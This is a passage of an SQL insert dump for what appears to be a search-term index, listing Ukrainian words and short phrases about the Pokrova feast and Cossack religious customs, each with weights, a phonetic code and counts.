що',0,1,1.4,'з000',1,'*'),(1603326,'зображували','зображували',0,0,0.7333,'з000',1,'*'),(1603327,'зображували її','зображували її',0,1,1.4667,'з000',1,'*'),(1603328,'зображували її й','зображували її й',0,1,1.5333,'з000',1,'*'),(1603329,'зображували козаків','зображували козаків',0,1,1.6333,'з000',1,'*'),(1603330,'зображували козаків та','зображували козаків та',0,1,1.7333,'з000',1,'*'),(1603331,'зруйнування','зруйнування',0,0,0.7333,'з000',1,'*'),(1603332,'зруйнування запорозької','зруйнування запорозької',0,1,1.7667,'з000',1,'*'),(1603333,'зруйнування запорозької січі','зруйнування запорозької січі',0,1,1.9333,'з000',1,'*'),(1603334,'зустрічали','зустрічали',0,0,0.6667,'з000',1,'*'),(1603335,'зустрічали зиму','зустрічали зиму',0,1,1.5,'з000',1,'*'),(1603336,'зустрічали зиму бо','зустрічали зиму бо',0,1,1.6,'з000',1,'*'),(1603337,'й','й',0,0,0.0667,'й000',5,'*'),(1603338,'й захищає','й захищає',0,1,1.3,'й000',1,'*'),(1603339,'й захищає кожну','й захищає кожну',0,1,1.5,'й000',1,'*'),(1603340,'й кланявся','й кланявся',0,1,1.3333,'й000',1,'*'),(1603341,'й кланявся на','й кланявся на',0,1,1.4333,'й000',1,'*'),(1603342,'й на','й на',0,1,1.1333,'й000',2,'*'),(1603343,'й на хоругвах','й на хоругвах',0,1,1.4333,'й000',1,'*'),(1603344,'й оточена','й оточена',0,1,1.3,'й000',1,'*'),(1603345,'й оточена ангелами','й оточена ангелами',0,1,1.6,'й000',1,'*'),(1603346,'йде','йде',0,0,0.2,'й000',1,'*'),(1603347,'йде на','йде на',0,1,1.2,'й000',1,'*'),(1603348,'йде на це','йде на це',0,1,1.3,'й000',1,'*'),(1603349,'його благодать','його благодать',0,1,1.4667,'й000',1,'*'),(1603350,'його благодать незримо','його благодать незримо',0,1,1.7333,'й000',1,'*'),(1603351,'його успішності','його успішності',0,1,1.5,'й000',1,'*'),(1603352,'його успішності козаки','його успішності козаки',0,1,1.7333,'й000',1,'*'),(1603353,'календарем','календарем',0,0,0.6667,'к000',1,'*'),(1603354,'календарем були','календарем були',0,1,1.5,'к000',1,'*'),(1603355,'календарем були церковні','календарем були церковні',0,1,1.8,'к000',1,'*'),(1603356,'кланявся','кланявся',0,0,0.5333,'к000',1,'*'),(1603357,'кланявся на','кланявся на',0,1,1.3667,'к000',1,'*'),(1603358,'кланявся на чотири','кланявся на чотири',0,1,1.6,'к000',1,'*'),(1603359,'кожним','кожним',0,0,0.4,'к000',1,'*'),(1603360,'кожним походом','кожним походом',0,1,1.4667,'к000',1,'*'),(1603361,'кожним походом навколішки','кожним походом навколішки',0,1,1.8333,'к000',1,'*'),(1603362,'кожному козацькому','кожному козацькому',0,1,1.6,'к000',1,'*'),(1603363,'кожному козацькому курені','кожному козацькому курені',0,1,1.8333,'к000',1,'*'),(1603364,'кожну','кожну',0,0,0.3333,'к000',1,'*'),(1603365,'кожну людину','кожну людину',0,1,1.4,'к000',1,'*'),(1603366,'кожну людину оберігаючи','кожну людину оберігаючи',0,1,1.7667,'к000',1,'*'),(1603367,'козаків','козаків',0,0,0.4667,'к000',1,'*'),(1603368,'козаків був','козаків був',0,1,1.3667,'к000',1,'*'),(1603369,'козаків був особливий','козаків був особливий',0,1,1.7,'к000',1,'*'),(1603370,'козаків згідно','козаків згідно',0,1,1.4667,'к000',1,'*'),(1603371,'козаків згідно з','козаків згідно з',0,1,1.5333,'к000',1,'*'),(1603372,'козаків новообранийкошовий','козаків новообранийкошовий',0,1,1.8667,'к000',1,'*'),(1603373,'козаків новообранийкошовий дякував','козаків новообранийкошовий дякував',0,1,2,'к000',1,'*'),(1603374,'козаків та','козаків та',0,1,1.3333,'к000',1,'*'),(1603375,'козаків та їхніх','козаків та їхніх',0,1,1.5333,'к000',1,'*'),(1603376,'козаків що','козаків що',0,1,1.3333,'к000',1,'*'),(1603377,'козаків що за','козаків що за',0,1,1.4333,'к000',1,'*'),(1603378,'козаки відправляли','козаки відправляли',0,1,1.6,'к000',1,'*'),(1603379,'козаки відправляли молебень','козаки відправляли молебень',0,1,1.9,'к000',1,'*'),(1603380,'козаки вважалибогоматір','козаки вважалибогоматір',0,1,1.7667,'к000',1,'*'),(1603381,'козаки вважалибогоматір своєю','козаки вважалибогоматір своєю',0,1,1.9667,'к000',1,'*'),(1603382,'козаки виступали','козаки виступали',0,1,1.5333,'к000',1,'*'),(1603383,'козаки виступали у','козаки виступали у',0,1,1.6,'к000',1,'*'),(1603384,'козаки що','козаки що',0,1,1.3,'к000',1,'*'),(1603385,'козаки що пішли','козаки що пішли',0,1,1.5,'к000',1,'*'),(1603386,'козацькій','козацькій',0,0,0.6,'к000',1,'*'),(1603387,'козацькій раді','козацькій раді',0,1,1.4667,'к000',1,'*'),(1603388,'козацькій раді січовики','козацькій раді січовики',0,1,1.7667,'к000',1,'*'),(1603389,'козацьке','козацьке',0,0,0.5333,'к000',1,'*'),(1603390,'козацьке свято','козацьке свято',0,1,1.4667,'к000',1,'*'),(1603391,'козацьке свято на','козацьке свято на',0,1,1.5667,'к000',1,'*'),(1603392,'козацьких','козацьких',0,0,0.6,'к000',1,'*'),(1603393,'козацьких отаманів','козацьких отаманів',0,1,1.6,'к000',1,'*'),(1603394,'козацьких отаманів до','козацьких отаманів до',0,1,1.7,'к000',1,'*'),(1603395,'козацькому','козацькому',0,0,0.6667,'к000',1,'*'),(1603396,'козацькому курені','козацькому курені',0,1,1.5667,'к000',1,'*'),(1603397,'козацькому курені а','козацькому курені а',0,1,1.6333,'к000',1,'*'),(1603398,'козацькому курені зображували','козацькому курені зображували',0,1,1.9667,'к000',1,'*'),(1603399,'константинополі','константинополі',0,0,1,'к000',1,'*'),(1603400,'константинополі за','константинополі за',0,1,1.6,'к000',1,'*'),(1603401,'константинополі за визволення','константинополі за визволення',0,1,1.9667,'к000',1,'*'),(1603402,'кошового','кошового',0,0,0.5333,'к000',1,'*'),(1603403,'кошового отамана','кошового отамана',0,1,1.5333,'к000',1,'*'),(1603404,'кошового отамана за','кошового отамана за',0,1,1.6333,'к000',1,'*'),(1603405,'крім','крім',0,0,0.2667,'к000',3,'*'),(1603406,'крім власної','крім власної',0,1,1.4,'к000',1,'*'),(1603407,'крім власної зброї','крім власної зброї',0,1,1.6,'к000',1,'*'),(1603408,'культ','культ',0,0,0.3333,'к000',1,'*'),(1603409,'культ богородиці-покрови','культ богородиці-покрови',0,1,1.8,'к000',1,'*'),(1603410,'культ богородиці-покрови як','культ богородиці-покрови як',0,1,1.9,'к000',1,'*'),(1603411,'курені','курені',0,0,0.4,'к000',1,'*'),(1603412,'курені а','курені а',0,1,1.2667,'к000',1,'*'),(1603413,'курені а головна','курені а головна',0,1,1.5333,'к000',1,'*'),(1603414,'курені зображували','курені зображували',0,1,1.6,'к000',1,'*'),(1603415,'курені зображували її','курені зображували її',0,1,1.7,'к000',1,'*'),(1603416,'куренях','куренях',0,0,0.4667,'к000',1,'*'),(1603417,'куренях а','куренях а',0,1,1.3,'к000',1,'*'),(1603418,'куренях а оскільки','куренях а оскільки',0,1,1.6,'к000',1,'*'),(1603419,'легендами','легендами',0,0,0.6,'л000',1,'*'),(1603420,'легендами саме','легендами саме',0,1,1.4667,'л000',1,'*'),(1603421,'легендами саме на','легендами саме на',0,1,1.5667,'л000',1,'*'),(1603422,'любові','любові',0,0,0.4,'л000',2,'*'),(1603423,'любові та','любові та',0,1,1.3,'л000',1,'*'),(1603424,'любові та участі','любові та участі',0,1,1.5333,'л000',1,'*'),(1603425,'людей його','людей його',0,1,1.3333,'л000',1,'*'),(1603426,'людей його благодать','людей його благодать',0,1,1.6667,'л000',1,'*'),(1603427,'людей у','людей у',0,1,1.2333,'л000',1,'*'),(1603428,'людей у храмі','людей у храмі',0,1,1.4333,'л000',1,'*'),(1603429,'людину','людину',0,0,0.4,'л000',1,'*'),(1603430,'людину оберігаючи','людину оберігаючи',0,1,1.5667,'л000',1,'*'),(1603431,'людину оберігаючи від','людину оберігаючи від',0,1,1.7,'л000',1,'*'),(1603432,'людський','людський',0,0,0.5333,'л000',1,'*'),(1603433,'людський воно','людський воно',0,1,1.4333,'л000',1,'*'),(1603434,'людський воно є','людський воно є',0,1,1.5,'л000',1,'*'),(1603435,'людям','людям',0,0,0.3333,'л000',2,'*'),(1603436,'людям які','людям які',0,1,1.3,'л000',1,'*'),(1603437,'людям які молилися','людям які молилися',0,1,1.6,'л000',1,'*'),(1603438,'місто','місто',0,0,0.3333,'м000',2,'*'),(1603439,'місто пресвята','місто пресвята',0,1,1.4667,'м000',1,'*'),(1603440,'місто пресвята діва','місто пресвята діва',0,1,1.6333,'м000',1,'*'),(1603441,'місць','місць',0,0,0.3333,'м000',2,'*'),(1603442,'місць за','місць за',0,1,1.2667,'м000',1,'*'),(1603443,'місць за дунай','місць за дунай',0,1,1.4667,'м000',1,'*'),(1603444,'маємо','маємо',0,0,0.3333,'м000',2,'*'),(1603445,'маємо козацьке','маємо козацьке',0,1,1.4667,'м000',1,'*'),(1603446,'маємо козацьке свято','маємо козацьке свято',0,1,1.6667,'м000',1,'*'),(1603447,'мав','мав',0,0,0.2,'м000',2,'*'),(1603448,'мав двічі','мав двічі',0,1,1.3,'м000',1,'*'),(1603449,'мав двічі відмовитися','мав двічі відмовитися',0,1,1.7,'м000',1,'*'),(1603450,'мали','мали',0,0,0.2667,'м000',2,'*'),(1603451,'мали та','мали та',0,1,1.2333,'м000',1,'*'),(1603452,'мали та інших','мали та інших',0,1,1.4333,'м000',1,'*'),(1603453,'марії','марії',0,0,0.3333,'м000',1,'*'),(1603454,'марії з','марії з',0,1,1.2333,'м000',1,'*'),(1603455,'марії з омофором','марії з омофором',0,1,1.5333,'м000',1,'*'),(1603456,'марія зі','марія зі',0,1,1.2667,'м000',1,'*'),(1603457,'марія зі сльозами','марія зі сльозами',0,1,1.5667,'м000',1,'*'),(1603458,'матір','матір',0,0,0.3333,'м000',1,'*'),(1603459,'матір божа','матір божа',0,1,1.3333,'м000',1,'*'),(1603460,'матір божа відчуває','матір божа відчуває',0,1,1.6333,'м000',1,'*'),(1603461,'матір на','матір на',0,1,1.2667,'м000',1,'*'),(1603462,'матір на знак','матір на знак',0,1,1.4333,'м000',1,'*'),(1603463,'матері','матері',0,0,0.4,'м000',1,'*'),(1603464,'матері саме','матері саме',0,1,1.3667,'м000',1,'*'),(1603465,'матері саме на','матері саме на',0,1,1.4667,'м000',1,'*'),(1603466,'матері та','матері та',0,1,1.3,'м000',1,'*'),(1603467,'матері та ікона','матері та ікона',0,1,1.5,'м000',1,'*'),(1603468,'милість','милість',0,0,0.4667,'м000',1,'*'),(1603469,'милість прибігаємо».','милість прибігаємо».',0,1,1.6667,'м000',1,'*'),(1603470,'милість прибігаємо». після','милість прибігаємо». після',0,1,1.8667,'м000',1,'*'),(1603471,'молебень','молебень',0,0,0.5333,'м000',1,'*'),(1603472,'молебень на','молебень на',0,1,1.3667,'м000',1,'*'),(1603473,'молебень на честь','молебень на честь',0,1,1.5667,'м000',1,'*'),(1603474,'молилися','молилися',0,0,0.5333,'м000',1,'*'),(1603475,'молилися за','молилися за',0,1,1.3667,'м000',1,'*'),(1603476,'молилися за воїнів','молилися за воїнів',0,1,1.6,'м000',1,'*'),(1603477,'молилися у','молилися у',0,1,1.3333,'м000',1,'*'),(1603478,'молилися у влахернському','молилися у влахернському',0,1,1.8,'м000',1,'*'),(1603479,'молитву','молитву',0,0,0.4667,'м000',1,'*'),(1603480,'молитву до','молитву до',0,1,1.3333,'м000',1,'*'),(1603481,'молитву до пресвятої','молитву до пресвятої',0,1,1.6667,'м000',1,'*'),(1603482,'молити','молити',0,0,0.4,'м000',1,'*'),(1603483,'молити бога','молити бога',0,1,1.3667,'м000',1,'*'),(1603484,'молити бога за','молити бога за',0,1,1.4667,'м000',1,'*'),(1603485,'нічого','нічого',0,0,0.4,'н000',1,'*'),(1603486,'нічого крім','нічого крім',0,1,1.3667,'н000',1,'*'),(1603487,'нічого крім власної','нічого крім власної',0,1,1.6333,'н000',1,'*'),(1603488,'на богослужіннях','на богослужіннях',0,1,1.5333,'н000',1,'*'),(1603489,'на богослужіннях пресвята','на богослужіннях пресвята',0,1,1.8333,'н000',1,'*'),(1603490,'на зимівлю','на зимівлю',0,1,1.3333,'н000',1,'*'),(1603491,'на зимівлю по','на зимівлю по',0,1,1.4333,'н000',1,'*'),(1603492,'на знак','на знак',0,1,1.2333,'н000',1,'*'),(1603493,'на знак того','на знак того',0,1,1.4,'н000',1,'*'),(1603494,'на козацькій','на козацькій',0,1,1.4,'н000',1,'*'),(1603495,'на козацькій раді','на козацькій раді',0,1,1.5667,'н000',1,'*'),(1603496,'на молитву','на молитву',0,1,1.3333,'н000',1,'*'),(1603497,'на молитву до','на молитву до',0,1,1.4333,'н000',1,'*'),(1603498,'на покрову','на покрову',0,1,1.3333,'н000',1,'*'),(1603499,'на покрову вони','на покрову вони',0,1,1.5,'н000',1,'*'),(1603500,'на покрову до','на покрову до',0,1,1.4333,'н000',1,'*'),(1603501,'на покрову молилися','на покрову молилися',0,1,1.6333,'н000',1,'*'),(1603502,'на покрову українські','на покрову українські',0,1,1.7,'н000',1,'*'),(1603503,'на прохання','на прохання',0,1,1.3667,'н000',1,'*'),(1603504,'на прохання козаків','на прохання козаків',0,1,1.6333,'н000',1,'*'),(1603505,'на січі','на січі',0,1,1.2333,'н000',1,'*'),(1603506,'на січі залишалася','на січі залишалася',0,1,1.6,'н000',1,'*'),(1603507,'на свято','на свято',0,1,1.2667,'н000',1,'*'),(1603508,'на свято покрови','на свято покрови',0,1,1.5333,'н000',1,'*'),(1603509,'на хоругвах','на хоругвах',0,1,1.3667,'н000',1,'*'),(1603510,'на хоругвах під','на хоругвах під',0,1,1.5,'н000',1,'*'),(1603511,'на це','на це',0,1,1.1667,'н000',1,'*'),(1603512,'на це не','на це не',0,1,1.2667,'н000',1,'*'),(1603513,'на честь','на честь',0,1,1.2667,'н000',1,'*'),(1603514,'на честь божої','на честь божої',0,1,1.4667,'н000',1,'*'),(1603515,'на честь нього','на честь нього',0,1,1.4667,'н000',1,'*'),(1603516,'на честь покрови','на честь покрови',0,1,1.5333,'н000',1,'*'),(1603517,'на чотири','на чотири',0,1,1.3,'н000',2,'*'),(1603518,'на чотири боки','на чотири боки',0,1,1.4667,'н000',1,'*'),(1603519,'на якій','на якій',0,1,1.2333,'н000',1,'*'),(1603520,'на якій зображували','на якій зображували',0,1,1.6333,'н000',1,'*'),(1603521,'навіть','навіть',0,0,0.4,'н000',4,'*'),(1603522,'навіть особливий','навіть особливий',0,1,1.5333,'н000',1,'*'),(1603523,'навіть особливий тип','навіть особливий тип',0,1,1.6667,'н000',1,'*'),(1603524,'навколішки','навколішки',0,0,0.6667,'н000',1,'*'),(1603525,'навколішки ставали','навколішки ставали',0,1,1.6,'н000',1,'*'),(1603526,'навколішки ставали на','навколішки ставали на',0,1,1.7,'н000',1,'*'),(1603527,'називалась','називалась',0,0,0.6667,'н000',1,'*'),(1603528,'називалась на','називалась на',0,1,1.4333,'н000',1,'*'),(1603529,'називалась на честь','називалась на честь',0,1,1.6333,'н000',1,'*'),(1603530,'найбільшу','найбільшу',0,0,0.6,'н000',1,'*'),(1603531,'найбільшу цінність','найбільшу цінність',0,1,1.6,'н000',1,'*'),(1603532,'найбільшу цінність ікону','найбільшу цінність ікону',0,1,1.8,'н000',1,'*'),(1603533,'найвеличніших','найвеличніших',0,0,0.8667,'н000',1,'*'),(1603534,'найвеличніших свят','найвеличніших свят',0,1,1.6,'н000',1,'*'),(1603535,'найвеличніших свят тому','найвеличніших свят тому',0,1,1.7667,'н000',1,'*'),(1603536,'наплічник','наплічник',0,0,0.6,'н000',1,'*'),(1603537,'наплічник тобто','наплічник тобто',0,1,1.5,'н000',1,'*'),(1603538,'наплічник тобто довга','наплічник тобто довга',0,1,1.7,'н000',1,'*'),(1603539,'народ','народ',0,0,0.3333,'н000',1,'*'),(1603540,'народ під','народ під',0,1,1.3,'н000',1,'*'),(1603541,'народ під свою','народ під свою',0,1,1.4667,'н000',1,'*'),(1603542,'нас','нас',0,0,0.2,'н000',3,'*'),(1603543,'нас дійшли','нас дійшли',0,1,1.3333,'н000',1,'*'),(1603544,'нас дійшли перекази','нас дійшли перекази',0,1,1.6333,'н000',1,'*'),(1603545,'нашої богородиці','нашої богородиці',0,1,1.5333,'н000',1,'*'),(1603546,'нашої богородиці та','нашої богородиці та',0,1,1.6333,'н000',1,'*'),(1603547,'не з','не з',0,1,1.1333,'н000',1,'*'),(1603548,'не з власної','не з власної',0,1,1.4,'н000',1,'*'),(1603549,'не мали','не мали',0,1,1.2333,'н000',1,'*'),(1603550,'не мали та','не мали та',0,1,1.3333,'н000',1,'*'),(1603551,'небесним','небесним',0,0,0.5333,'н000',1,'*'),(1603552,'небесним світлом','небесним світлом',0,1,1.5333,'н000',1,'*'),(1603553,'небесним світлом й','небесним світлом й',0,1,1.6,'н000',1,'*'),(1603554,'небесною','небесною',0,0,0.5333,'н000',1,'*'),(1603555,'небесною славою','небесною славою',0,1,1.5,'н000',1,'*'),(1603556,'небесною славою а','небесною славою а',0,1,1.5667,'н000',1,'*'),(1603557,'невпинного','невпинного',0,0,0.6667,'н000',1,'*'),(1603558,'невпинного заступництва','невпинного заступництва',0,1,1.7667,'н000',1,'*'),(1603559,'невпинного заступництва владичиці','невпинного заступництва владичиці',0,1,2,'н000',1,'*'),(1603560,'незалежно від його','незалежно від його',0,1,1.6,'н000',1,'*'),(1603561,'незримо','незримо',0,0,0.4667,'н000',1,'*'),(1603562,'незримо покриває','незримо покриває',0,1,1.5333,'н000',1,'*'),(1603563,'незримо покриває й','незримо покриває й',0,1,1.6,'н000',1,'*'),(1603564,'нелегкий','нелегкий',0,0,0.5333,'н000',1,'*'),(1603565,'нелегкий час','нелегкий час',0,1,1.4,'н000',1,'*'),(1603566,'нелегкий час цього','нелегкий час цього',0,1,1.6,'н000',1,'*'),(1603567,'нерідко','нерідко',0,0,0.4667,'н000',1,'*'),(1603568,'нерідко 14','нерідко 14',0,1,1.3333,'н000',1,'*'),(1603569,'нерідко 14 жовтня','нерідко 14 жовтня',0,1,1.5667,'н000',1,'*'),(1603570,'новозбудовані','новозбудовані',0,0,0.8667,'н000',1,'*'),(1603571,'новозбудовані храми','новозбудовані храми',0,1,1.6333,'н000',1,'*'),(1603572,'новозбудовані храми покров','новозбудовані храми покров',0,1,1.8667,'н000',1,'*'),(1603573,'новообранийкошовий','новообранийкошовий',0,0,1,'н000',1,'*'),(1603574,'новообранийкошовий дякував','новообранийкошовий дякував',0,1,1.8667,'н000',1,'*'),(1603575,'новообранийкошовий дякував своїм','новообранийкошовий дякував своїм',0,1,2,'н000',1,'*'),(1603576,'носять','носять',0,0,0.4,'н000',1,'*'),(1603577,'носять священники','носять священники',0,1,1.5667,'н000',1,'*'),(1603578,'носять священники на','носять священники на',0,1,1.6667,'н000',1,'*'),(1603579,'нього','нього',0,0,0.3333,'н000',1,'*'),(1603580,'нього досить','нього досить',0,1,1.4,'н000',1,'*'),(1603581,'нього досить часто','нього досить часто',0,1,1.6,'н000',1,'*'),(1603582,'обіду','обіду',0,0,0.3333,'о000',1,'*'),(1603583,'обіду зима','обіду зима',0,1,1.3333,'о000',1,'*'),(1603584,'обіду зима особливе','обіду зима особливе',0,1,1.6333,'о000',1,'*'),(1603585,'обіду осінь','обіду осінь',0,1,1.3667,'о000',1,'*'),(1603586,'обіду осінь а','обіду осінь а',0,1,1.4333,'о000',1,'*'),(1603587,'оберігаючи','оберігаючи',0,0,0.6667,'о000',1,'*'),(1603588,'оберігаючи від','оберігаючи від',0,1,1.4667,'о000',1,'*'),(1603589,'оберігаючи від гріха','оберігаючи від гріха',0,1,1.6667,'о000',1,'*'),(1603590,'обирали','обирали',0,0,0.4667,'о000',2,'*'),(1603591,'обирали козацьких','обирали козацьких',0,1,1.5667,'о000',1,'*'),(1603592,'обирали козацьких отаманів','обирали козацьких отаманів',0,1,1.8667,'о000',1,'*'),(1603593,'обирали собі','обирали собі',0,1,1.4,'о000',1,'*'),(1603594,'обирали собі кошового','обирали собі кошового',0,1,1.7,'о000',1,'*'),(1603595,'одним','одним',0,0,0.3333,'о000',1,'*'),(1603596,'одним із','одним із',0,1,1.2667,'о000',1,'*'),(1603597,'одним із найвеличніших','одним із найвеличніших',0,1,1.7333,'о000',1,'*'),(1603598,'омофор','омофор',0,0,0.4,'о000',1,'*'),(1603599,'омофор наплічник','омофор наплічник',0,1,1.5333,'о000',1,'*'),(1603600,'омофор наплічник тобто','омофор наплічник тобто',0,1,1.7333,'о000',1,'*'),(1603601,'омофором','омофором',0,0,0.5333,'о000',1,'*'),(1603602,'омофором була','омофором була',0,1,1.4333,'о000',1,'*'),(1603603,'омофором була у','омофором була у',0,1,1.5,'о000',1,'*'),(1603604,'омофором грецький','омофором грецький',0,1,1.5667,'о000',1,'*'),(1603605,'омофором грецький омофор','омофором грецький омофор',0,1,1.8,'о000',1,'*'),(1603606,'опіку','опіку',0,0,0.3333,'о000',1,'*'),(1603607,'опіку покрила','опіку покрила',0,1,1.4333,'о000',1,'*'),(1603608,'опіку покрила людей','опіку покрила людей',0,1,1.6333,'о000',1,'*'),(1603609,'осінню','осінню',0,0,0.4,'о000',2,'*'),(1603610,'осінню і','осінню і',0,1,1.2667,'о000',1,'*'),(1603611,'осінню і зустрічали','осінню і зустрічали',0,1,1.6333,'о000',1,'*'),(1603612,'осінь','осінь',0,0,0.3333,'о000',1,'*'),(1603613,'осінь а','осінь а',0,1,1.2333,'о000',1,'*'),(1603614,'осінь а після','осінь а після',0,1,1.4333,'о000',1,'*'),(1603615,'освячують','освячують',0,0,0.6,'о000',1,'*'),(1603616,'освячують новозбудовані','освячують новозбудовані',0,1,1.7667,'о000',1,'*'),(1603617,'освячують новозбудовані храми','освячують новозбудовані храми',0,1,1.9667,'о000',1,'*'),(1603618,'оскільки','оскільки',0,0,0.5333,'о000',1,'*'),(1603619,'оскільки у','оскільки у',0,1,1.3333,'о000',1,'*'),(1603620,'оскільки у ті','оскільки у ті',0,1,1.4333,'о000',1,'*'),(1603621,'основним','основним',0,0,0.5333,'о000',1,'*'),(1603622,'основним календарем','основним календарем',0,1,1.6333,'о000',1,'*'),(1603623,'основним календарем були','основним календарем були',0,1,1.8,'о000',1,'*'),(1603624,'особливе','особливе',0,0,0.5333,'о000',1,'*'),(1603625,'особливе ставлення','особливе ставлення',0,1,1.6,'о000',1,'*'),(1603626,'особливе ставлення до','особливе ставлення до',0,1,1.7,'о000',1,'*'),(1603627,'особливий','особливий',0,0,0.6,'о000',1,'*'),(1603628,'особливий культ','особливий культ',0,1,1.5,'о000',1,'*'),(1603629,'особливий культ богородиці-покрови','особливий культ богородиці-покрови',0,1,2,'о000',1,'*'),(1603630,'особливий тип','особливий тип',0,1,1.4333,'о000',1,'*'),(1603631,'особливий тип ікони','особливий тип ікони',0,1,1.6333,'о000',1,'*'),(1603632,'осяяна','осяяна',0,0,0.4,'о000',1,'*'),(1603633,'осяяна небесним','осяяна небесним',0,1,1.5,'о000',1,'*'),(1603634,'осяяна небесним світлом','осяяна небесним світлом',0,1,1.7667,'о000',1,'*'),(1603635,'отаманів','отаманів',0,0,0.5333,'о000',1,'*'),(1603636,'отаманів до','отаманів до',0,1,1.3667,'о000',1,'*'),(1603637,'отаманів до нас','отаманів до нас',0,1,1.5,'о000',1,'*'),(1603638,'отамана','отамана',0,0,0.4667,'о000',1,'*'),(1603639,'отамана за','отамана за',0,1,1.3333,'о000',1,'*'),(1603640,'отамана за звичаєм','отамана за звичаєм',0,1,1.6,'о000',1,'*'),(1603641,'оточена','оточена',0,0,0.4667,'о000',1,'*'),(1603642,'оточена ангелами','оточена ангелами',0,1,1.5333,'о000',1,'*'),(1603643,'оточена ангелами та','оточена ангелами та',0,1,1.6333,'о000',1,'*'),(1603644,'оточили','оточили',0,0,0.4667,'о000',1,'*'),(1603645,'оточили місто','оточили місто',0,1,1.4333,'о000',1,'*'),(1603646,'оточили місто пресвята','оточили місто пресвята',0,1,1.7333,'о000',1,'*'),(1603647,'очолити','очолити',0,0,0.4667,'о000',1,'*'),(1603648,'очолити «шановане','очолити «шановане',0,1,1.5667,'о000',1,'*'),(1603649,'очолити «шановане товариство».','очолити «шановане товариство».',0,1,2,'о000',1,'*'),(1603650,'очолювати','очолювати',0,0,0.6,'о000',1,'*'),(1603651,'очолювати й','очолювати й',0,1,1.3667,'о000',1,'*'),(1603652,'очолювати й кланявся','очолювати й кланявся',0,1,1.6667,'о000',1,'*'),(1603653,'під розпростертим','під розпростертим',0,1,1.5667,'п000',1,'*'),(1603654,'під розпростертим покровом','під розпростертим покровом',0,1,1.8667,'п000',1,'*'),(1603655,'під свою','під свою',0,1,1.2667,'п000',1,'*'),(1603656,'під свою опіку','під свою опіку',0,1,1.4667,'п000',1,'*'),(1603657,'під якими','під якими',0,1,1.3,'п000',1,'*'),(1603658,'під якими козаки','під якими козаки',0,1,1.5333,'п000',1,'*'),(1603659,'підкреслюючи','підкреслюючи',0,0,0.8,'п000',1,'*'),(1603660,'підкреслюючи що','підкреслюючи що',0,1,1.5,'п000',1,'*'),(1603661,'підкреслюючи що йде','підкреслюючи що йде',0,1,1.6333,'п000',1,'*'),(1603662,'після завершення','після завершення',0,1,1.5333,'п000',1,'*'),(1603663,'після завершення походу','після завершення походу',0,1,1.7667,'п000',1,'*'),(1603664,'після зруйнування','після зруйнування',0,1,1.5667,'п000',1,'*'),(1603665,'після зруйнування запорозької','після зруйнування запорозької',0,1,1.9667,'п000',1,'*'),(1603666,'після обіду','після обіду',0,1,1.3667,'п000',1,'*'),(1603667,'після обіду зима','після обіду зима',0,1,1.5333,'п000',1,'*'),(1603668,'після третьої','після третьої',0,1,1.4333,'п000',1,'*'),(1603669,'після третьої пропозиції','після третьої пропозиції',0,1,1.8,'п000',1,'*'),(1603670,'пішли','пішли',0,0,0.3333,'п000',1,'*'),(1603671,'пішли з','пішли з',0,1,1.2333,'п000',1,'*'),(1603672,'пішли з рідних','пішли з рідних',0,1,1.4667,'п000',1,'*'),(1603673,'перебували','перебували',0,0,0.6667,'п000',1,'*'),(1603674,'перебували у','перебували у',0,1,1.4,'п000',1,'*'),(1603675,'перебували у походах','перебували у походах',0,1,1.6667,'п000',1,'*'),(1603676,'перед кожним','перед кожним',0,1,1.4,'п000',1,'*'),(1603677,'перед кожним походом','перед кожним походом',0,1,1.6667,'п000',1,'*'),(1603678,'переказами','переказами',0,0,0.6667,'п000',1,'*'),(1603679,'переказами та','переказами та',0,1,1.4333,'п000',1,'*'),(1603680,'переказами та легендами','переказами та легендами',0,1,1.7667,'п000',1,'*'),(1603681,'переказами у','переказами у',0,1,1.4,'п000',1,'*'),(1603682,'переказами у 910','переказами у 910',0,1,1.5333,'п000',1,'*'),(1603683,'перекази','перекази',0,0,0.5333,'п000',1,'*'),(1603684,'перекази про','перекази про',0,1,1.4,'п000',1,'*'),(1603685,'перекази про те','перекази про те',0,1,1.5,'п000',1,'*'),(1603686,'перший','перший',0,0,0.4,'п000',4,'*'),(1603687,'перший сніг','перший сніг',0,1,1.3667,'п000',1,'*'),(1603688,'перший сніг який','перший сніг який',0,1,1.5333,'п000',1,'*'),(1603689,'по своїх','по своїх',0,1,1.2667,'п000',1,'*'),(1603690,'по своїх хуторах','по своїх хуторах',0,1,1.5333,'п000',1,'*'),(1603691,'побратимам','побратимам',0,0,0.6667,'п000',1,'*'),(1603692,'побратимам за','побратимам за',0,1,1.4333,'п000',1,'*'),(1603693,'побратимам за честь','побратимам за честь',0,1,1.6333,'п000',1,'*'),(1603694,'повстанської армії упа','повстанської армії упа',0,1,1.7333,'п000',1,'*'),(1603695,'погоджувався','погоджувався',0,0,0.8,'п000',1,'*'),(1603696,'погоджувався після','погоджувався після',0,1,1.6,'п000',1,'*'),(1603697,'погоджувався після третьої','погоджувався після третьої',0,1,1.8667,'п000',1,'*'),(1603698,'покрив','покрив',0,0,0.4,'п000',1,'*'),(1603699,'покрив і','покрив і',0,1,1.2667,'п000',1,'*'),(1603700,'покрив і захистив','покрив і захистив',0,1,1.5667,'п000',1,'*'),(1603701,'покрив у','покрив у',0,1,1.2667,'п000',1,'*'),(1603702,'покрив у руках','покрив у руках',0,1,1.4667,'п000',1,'*'),(1603703,'покриває','покриває',0,0,0.5333,'п000',1,'*'),(1603704,'покриває й','покриває й',0,1,1.3333,'п000',1,'*'),(1603705,'покриває й захищає','покриває й захищає',0,1,1.6,'п000',1,'*'),(1603706,'покривалом','покривалом',0,0,0.6667,'п000',1,'*'),(1603707,'покривалом або','покривалом або',0,1,1.4667,'п000',1,'*'),(1603708,'покривалом або фатою','покривалом або фатою',0,1,1.6667,'п000',1,'*'),(1603709,'покрила','покрила',0,0,0.4667,'п000',1,'*'),(1603710,'покрила людей','покрила людей',0,1,1.4333,'п000',1,'*'),(1603711,'покрила людей у','покрила людей у',0,1,1.5,'п000',1,'*'),(1603712,'покров','покров',0,0,0.4,'п000',1,'*'),(1603713,'покров пресвятої','покров пресвятої',0,1,1.5333,'п000',1,'*'),(1603714,'покров пресвятої діви','покров пресвятої діви',0,1,1.7,'п000',1,'*'),(1603715,'покрова вважається','покрова вважається',0,1,1.6,'п000',1,'*'),(1603716,'покрова вважається і','покрова вважається і',0,1,1.6667,'п000',1,'*'),(1603717,'покрова»,','покрова»,',0,0,0.6,'п000',1,'*'),(1603718,'покрова», на','покрова», на',0,1,1.4,'п000',1,'*'),(1603719,'покрова», на якій','покрова», на якій',0,1,1.5667,'п000',1,'*'),(1603720,'покрови','покрови',0,0,0.4667,'п000',1,'*'),(1603721,'покрови а','покрови 